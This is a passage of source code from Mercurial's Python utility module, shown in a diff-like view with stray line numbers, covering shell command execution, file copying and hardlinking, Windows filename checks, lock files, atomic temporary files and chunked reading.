        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            # OpenVMS reports success with an odd status; normalize to 0
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort cleanup of both temporary files
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
909
921
# maps a filter-spec prefix to the function implementing that filter style
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
    }
914
926
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    # dispatch on a recognized prefix; anything else is a plain pipe command
    for prefix in filtertable:
        if cmd.startswith(prefix):
            return filtertable[prefix](s, cmd[len(prefix):].lstrip())
    return pipefilter(s, cmd)
921
933
def binary(s):
    """return true if a string is binary data"""
    # empty / None input is never considered binary
    if not s:
        return False
    return '\0' in s
925
937
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def floorlog2(x):
        # index of the highest set bit; 0 when x == 0
        if not x:
            return 0
        bits = 0
        while x:
            x >>= 1
            bits += 1
        return bits - 1

    pending = []
    size = 0
    for piece in source:
        pending.append(piece)
        size += len(piece)
        if size < min:
            continue
        if min < max:
            # double the threshold, or jump straight to the (power-of-two
            # rounded) size we actually accumulated, capped at max
            min = min << 1
            rounded = 1 << floorlog2(size)
            if rounded > min:
                min = rounded
            if min > max:
                min = max
        yield ''.join(pending)
        pending = []
        size = 0
    if pending:
        yield ''.join(pending)
956
968
# convenience alias: callers can raise util.Abort without importing error
Abort = error.Abort
958
970
def always(fn):
    '''predicate that accepts anything, ignoring its argument'''
    return True

def never(fn):
    '''predicate that rejects anything, ignoring its argument'''
    return False
964
976
def nogc(func):
    """decorator disabling the garbage collector for the call's duration

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated, even when they are marked as untracked. Tracking only affects
    which objects the GC inspects, not when it runs. As a workaround,
    disable GC while building complex (huge) containers.

    This garbage collector issue has been fixed in 2.7, but it still
    affects CPython's performance.
    """
    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # never re-enable GC behind the back of a caller that had it off
            if wasenabled:
                gc.enable()
    return wrapper
987
999
if pycompat.ispypy:
    # PyPy runs slower with gc disabled, so make nogc a no-op there
    nogc = lambda x: x
991
1003
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        # different drives (Windows) make a relative path impossible;
        # fall back to an absolute path under root
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    # strip the common leading components of both paths
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    # climb out of what remains of n1, then descend into n2's remainder
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1017
1029
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    # any one of the freeze markers is sufficient
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze
1027
1039
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

# cached path of the 'hg' executable; lazily filled in by hgexecutable()
_hgexecutable = None
1038
1050
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.

    The result is computed once and cached in the module-level
    _hgexecutable; later calls return the cached value.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            # running directly from an 'hg' script
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            # last resort: search $PATH, then fall back to argv[0]'s name
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1062
1074
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    # stores the value read back by hgexecutable()
    global _hgexecutable
    _hgexecutable = path
1067
1079
1068 def _isstdout(f):
1080 def _isstdout(f):
1069 fileno = getattr(f, 'fileno', None)
1081 fileno = getattr(f, 'fileno', None)
1070 return fileno and fileno() == sys.__stdout__.fileno()
1082 return fileno and fileno() == sys.__stdout__.fileno()
1071
1083
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        # None/False -> '0', True -> '1', everything else via str()
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return str(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    # let spawned commands re-invoke the same hg binary that started them
    env['HG'] = hgexecutable()
    return env
1086
1098
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.

    Returns the child's exit code (0 on OpenVMS "odd" success statuses).
    '''
    try:
        # flush our buffered output before the child writes to the same fd
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        # child can write straight to our stdout; no piping needed
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # capture the child's combined stdout+stderr and copy it to out
        # line by line
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        # OpenVMS reports success with an odd status; normalize to 0
        rc = 0
    return rc
1113
1125
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # a traceback of depth 1 means the TypeError came from the call
            # expression itself (wrong signature), not from inside func's
            # body; report it as a SignatureError
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check
1125
1137
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1140
1152
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember the old stat so mtime ambiguity between the old
            # and the newly copied file can be detected and fixed below
            oldstat = filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat.frompath(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1192
1204
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    # files handled so far; reported through progress() and used to
    # offset the progress position of recursive calls
    num = 0

    # topic is computed lazily because hardlink may be flipped below
    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # only attempt hardlinks when src and dst are on the same
            # device (st_dev differs across filesystems)
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # shift child progress by the files already counted here
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # linking failed; disable hardlinking for the rest of
                # the tree and fall back to a regular copy
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num
1232
1244
# names and characters that are invalid in Windows filenames;
# consulted (case-insensitively for the names) by checkwinfilename below
_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    # treat '\' and '/' alike and inspect each path component
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                # control characters are invalid in Windows filenames
                return _("filename contains %r, which is invalid "
                         "on Windows") % c
        # reserved device names apply regardless of extension
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1]
        # a trailing '.' or ' ' is rejected, but the components '.' and
        # '..' themselves are fine -- note "n not in '..'" is substring
        # containment, which covers exactly those two names
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t
1285
1297
# select the platform-appropriate filename check and wall-clock timer
if pycompat.osname == 'nt':
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    # prefer the high-resolution timer when the interpreter provides it
    timer = time.perf_counter
1295
1307
def makelock(info, pathname):
    """Create a lock file at pathname recording info.

    Prefers a symlink whose target is info; when symlinks are not
    available (or creation fails for a reason other than the lock
    already existing), falls back to an exclusively-created regular
    file containing info.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        # EEXIST means someone else holds the lock -- report it;
        # any other failure falls through to the plain-file scheme
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    fd = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(fd, info)
    os.close(fd)
1308
1320
def readlock(pathname):
    """Return the info recorded in the lock at pathname.

    Mirror of makelock: the symlink target when the lock is a
    symlink, otherwise the contents of the regular lock file.
    """
    try:
        return os.readlink(pathname)
    except OSError as why:
        # EINVAL: not a symlink; ENOSYS: symlinks unsupported --
        # in either case fall through to reading a regular file
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    data = fp.read()
    fp.close()
    return data
1321
1333
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        fd = fp.fileno()
    except AttributeError:
        # no file descriptor available; fall back to stat by name
        return os.stat(fp.name)
    return os.fstat(fd)
1328
1340
1329 # File system features
1341 # File system features
1330
1342
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    orig = os.lstat(path)
    dirname, basename = os.path.split(path)
    # derive a case-flipped sibling name to probe with
    flipped = basename.upper()
    if flipped == basename:
        flipped = basename.lower()
    if flipped == basename:
        # the name has no case to fold; no evidence either way
        return True
    try:
        probe = os.lstat(os.path.join(dirname, flipped))
    except OSError:
        # the flipped spelling does not exist: case matters here
        return True
    # identical stat for both spellings means the fs folds case
    return probe != orig
1353
1365
try:
    import re2
    # tri-state flag: None = re2 importable but not yet verified to
    # work (see _re._checkre2); True/False once checked
    _re2 = None
except ImportError:
    _re2 = False
1359
1371
class _re(object):
    # Facade over the re module that transparently prefers the faster
    # re2 engine when it is installed and the pattern/flags allow it.
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes flags inline in the pattern, not as an argument
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                # pattern uses a feature re2 lacks; fall back to re
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

# module-level singleton used throughout as util.re
re = _re()
1404
1416
# cache of directory -> {normcased name: on-disk name} listings
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        # map each entry's normcased name to its on-disk spelling
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    # str.replace returns a new string; the result must be kept so
    # that a '\' separator (Windows os.sep) is escaped before being
    # interpolated into the regex character classes below.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            # separators are passed through unchanged
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patches of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
1447
1459
def getfstype(dirpath):
    '''Get the filesystem type name from a directory (best-effort)

    Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
    '''
    # not every platform implementation of osutil provides getfstype
    impl = getattr(osutil, 'getfstype', None)
    if impl is None:
        return None
    return impl(dirpath)
1454
1466
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        # derive the link name from the temp name ('...1~' -> '...2~')
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        # creating the temp file or the hardlink failed; assume links
        # are unreliable here
        return False
    finally:
        # best-effort cleanup of both temp names, ignoring failures
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass
1483
1495
def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    sep = pycompat.ossep
    altsep = pycompat.osaltsep
    # altsep may be empty/None on platforms with a single separator
    return path.endswith(sep) or altsep and path.endswith(altsep)
1488
1500
def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative of simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if need.'''
    sep = pycompat.ossep
    return path.split(sep)
1496
1508
def gui():
    '''Are we running in a GUI?'''
    if pycompat.sysplatform == 'darwin':
        if 'SSH_CONNECTION' in encoding.environ:
            # handle SSH access to a box where the user is logged in
            return False
        elif getattr(osutil, 'isgui', None):
            # check if a CoreGraphics session is available
            return osutil.isgui()
        else:
            # pure build; use a safe default
            return True
    else:
        # Windows is assumed to always have a GUI; elsewhere use the
        # presence of $DISPLAY as the signal (may be a truthy string)
        return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1511
1523
def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents from name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                # the original vanished; the empty temp file is the copy
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # remove the partial temp file before propagating any failure
        try: os.unlink(temp)
        except OSError: pass
        raise
    return temp
1550
1562
1551 class filestat(object):
1563 class filestat(object):
1552 """help to exactly detect change of a file
1564 """help to exactly detect change of a file
1553
1565
1554 'stat' attribute is result of 'os.stat()' if specified 'path'
1566 'stat' attribute is result of 'os.stat()' if specified 'path'
1555 exists. Otherwise, it is None. This can avoid preparative
1567 exists. Otherwise, it is None. This can avoid preparative
1556 'exists()' examination on client side of this class.
1568 'exists()' examination on client side of this class.
1557 """
1569 """
1558 def __init__(self, stat):
1570 def __init__(self, stat):
1559 self.stat = stat
1571 self.stat = stat
1560
1572
1561 @classmethod
1573 @classmethod
1562 def frompath(cls, path):
1574 def frompath(cls, path):
1563 try:
1575 try:
1564 stat = os.stat(path)
1576 stat = os.stat(path)
1565 except OSError as err:
1577 except OSError as err:
1566 if err.errno != errno.ENOENT:
1578 if err.errno != errno.ENOENT:
1567 raise
1579 raise
1568 stat = None
1580 stat = None
1569 return cls(stat)
1581 return cls(stat)
1570
1582
1571 @classmethod
1583 @classmethod
1572 def fromfp(cls, fp):
1584 def fromfp(cls, fp):
1573 stat = os.fstat(fp.fileno())
1585 stat = os.fstat(fp.fileno())
1574 return cls(stat)
1586 return cls(stat)
1575
1587
1576 __hash__ = object.__hash__
1588 __hash__ = object.__hash__
1577
1589
1578 def __eq__(self, old):
1590 def __eq__(self, old):
1579 try:
1591 try:
1580 # if ambiguity between stat of new and old file is
1592 # if ambiguity between stat of new and old file is
1581 # avoided, comparison of size, ctime and mtime is enough
1593 # avoided, comparison of size, ctime and mtime is enough
1582 # to exactly detect change of a file regardless of platform
1594 # to exactly detect change of a file regardless of platform
1583 return (self.stat.st_size == old.stat.st_size and
1595 return (self.stat.st_size == old.stat.st_size and
1584 self.stat.st_ctime == old.stat.st_ctime and
1596 self.stat.st_ctime == old.stat.st_ctime and
1585 self.stat.st_mtime == old.stat.st_mtime)
1597 self.stat.st_mtime == old.stat.st_mtime)
1586 except AttributeError:
1598 except AttributeError:
1587 pass
1599 pass
1588 try:
1600 try:
1589 return self.stat is None and old.stat is None
1601 return self.stat is None and old.stat is None
1590 except AttributeError:
1602 except AttributeError:
1591 return False
1603 return False
1592
1604
1593 def isambig(self, old):
1605 def isambig(self, old):
1594 """Examine whether new (= self) stat is ambiguous against old one
1606 """Examine whether new (= self) stat is ambiguous against old one
1595
1607
1596 "S[N]" below means stat of a file at N-th change:
1608 "S[N]" below means stat of a file at N-th change:
1597
1609
1598 - S[n-1].ctime < S[n].ctime: can detect change of a file
1610 - S[n-1].ctime < S[n].ctime: can detect change of a file
1599 - S[n-1].ctime == S[n].ctime
1611 - S[n-1].ctime == S[n].ctime
1600 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1612 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1601 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1613 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1602 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1614 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1603 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1615 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1604
1616
1605 Case (*2) above means that a file was changed twice or more at
1617 Case (*2) above means that a file was changed twice or more at
1606 same time in sec (= S[n-1].ctime), and comparison of timestamp
1618 same time in sec (= S[n-1].ctime), and comparison of timestamp
1607 is ambiguous.
1619 is ambiguous.
1608
1620
1609 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1621 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1610 timestamp is ambiguous".
1622 timestamp is ambiguous".
1611
1623
1612 But advancing mtime only in case (*2) doesn't work as
1624 But advancing mtime only in case (*2) doesn't work as
1613 expected, because naturally advanced S[n].mtime in case (*1)
1625 expected, because naturally advanced S[n].mtime in case (*1)
1614 might be equal to manually advanced S[n-1 or earlier].mtime.
1626 might be equal to manually advanced S[n-1 or earlier].mtime.
1615
1627
1616 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1628 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1617 treated as ambiguous regardless of mtime, to avoid overlooking
1629 treated as ambiguous regardless of mtime, to avoid overlooking
1618 by confliction between such mtime.
1630 by confliction between such mtime.
1619
1631
1620 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1632 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1621 S[n].mtime", even if size of a file isn't changed.
1633 S[n].mtime", even if size of a file isn't changed.
1622 """
1634 """
1623 try:
1635 try:
1624 return (self.stat.st_ctime == old.stat.st_ctime)
1636 return (self.stat.st_ctime == old.stat.st_ctime)
1625 except AttributeError:
1637 except AttributeError:
1626 return False
1638 return False
1627
1639
    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # bump mtime one second past the old value; the mask keeps it a
        # positive 31-bit value, matching how isambig-era timestamps are
        # stored
        advanced = (old.stat.st_mtime + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True
1649
1661
    def __ne__(self, other):
        # derive inequality from __eq__; Python 2 does not do this
        # automatically
        return not self == other
1652
1664
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        """Flush the temporary file into place over the permanent name."""
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # only stat the old file when the caller asked for ambiguity
            # checking; frompath returns a filestat with .stat = None if
            # the target does not exist yet
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        """Throw away all writes by deleting the temporary file."""
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit, discard if an exception escaped the block
        if exctype is not None:
            self.discard()
        else:
            self.close()
1715
1727
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
1727
1739
def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno == errno.ENOENT:
            return
        raise
1735
1747
def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            # reached the filesystem root without finding an existing
            # ancestor; nothing more we can create
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)
1763
1775
def readfile(path):
    """Return the entire binary contents of the file at ``path``."""
    with open(path, 'rb') as fobj:
        data = fobj.read()
    return data
1767
1779
def writefile(path, text):
    """Replace the contents of the file at ``path`` with ``text``."""
    with open(path, 'wb') as fobj:
        fobj.write(text)
1771
1783
def appendfile(path, text):
    """Append ``text`` to the file at ``path``, creating it if needed."""
    with open(path, 'ab') as fobj:
        fobj.write(text)
1775
1787
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # break chunks bigger than 1MB into 256KB pieces so a single
            # huge chunk is never carried around (and re-sliced) whole
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        # offset of the first unconsumed byte within self._queue[0]
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
